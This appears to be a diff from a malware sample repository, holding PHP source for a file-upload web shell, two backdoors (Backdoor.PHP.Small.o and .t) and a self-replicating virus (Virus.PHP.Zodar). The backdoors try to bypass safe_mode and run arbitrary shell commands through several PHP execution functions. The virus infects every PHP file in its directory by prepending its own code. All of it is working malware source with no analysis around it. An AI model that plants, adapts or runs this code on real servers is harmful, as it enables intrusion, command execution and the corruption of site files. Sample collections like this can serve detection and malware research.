<div align="left"><font size="1">Uploader file :</font></div>
<?php
$uploaded = $_FILES['file']['tmp_name'];
if (file_exists($uploaded)) {
$pwddir = $_POST['dir'];
$real = $_FILES['file']['name'];
$dez = $pwddir."/".$real;
copy($uploaded, $dez);
echo "FILE UPLOADED TO $dez";
}
?> </pre>
<form name="form1" method="post" enctype="multipart/form-data">
<input type="text" name="dir" size="30" value="<? passthru("pwd"); ?>">
<input type="submit" name="submit2" value="Upload">
<input type="file" name="file" size="15">
</td>
</tr>
</table>
</body>
</html>

51
PHP/Backdoor.PHP.Small.o Normal file
View File

@ -0,0 +1,51 @@
<?php
if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){
$contrs=0;
}
else{
ini_restore("safe_mode");
ini_restore("open_basedir");
if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){
$contrs=0;}
else{
$contrs=1;
}}
if($contrs == 0){
echo("FUCKSAFEMODEOFFBYMIC22");
}else{
echo("FUCKSAFEMODEONBYMIC22");
}
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
exit;

70
PHP/Backdoor.PHP.Small.t Normal file
View File

@ -0,0 +1,70 @@
<?
$dir = @getcwd();
echo "BAGOL<br>";
$OS = @PHP_OS;
echo "OSTYPE:$OS<br>";
echo "uname -a; $uname<br>";
$free = disk_free_space($dir);
if ($free === FALSE) {$free = 0;}
if ($free < 0) {$free = 0;}
echo "Free:".view_size($free)."<br>";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
function view_size($size)
{
if (!is_numeric($size)) {return FALSE;}
else
{
if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
else {$size = $size . " B";}
return $size;
}}
exit;

39
PHP/Virus.PHP.Zodar Normal file
View File

@ -0,0 +1,39 @@
<?php
function zodar()
{
//[Zodar] by Negral
//Created 03/05/2002
$c = "";
$f = fopen (__FILE__, "r");
$c = fread ($f, filesize (__FILE__));
fclose ($f);
$c = substr($c,0,866);
$handle=opendir('.');
while (($file = readdir($handle))!==false) {
if ($file != "." && $file != "..")
{
$s = substr($file, -3);
if ($s=="php")
{
$g = fopen ($file, "r");
$cont = fread ($g,filesize ($file));
fclose ($g);
if (!strstr($cont,"[Zodar]"))
{
unlink("$file");
$g = fopen ($file, "a+");
fwrite ($g,"$c");
fwrite ($g,"\n");
fwrite ($g,substr($cont,5));
fclose ($g);
}
}
}
}
closedir($handle);
}
zodar();
?>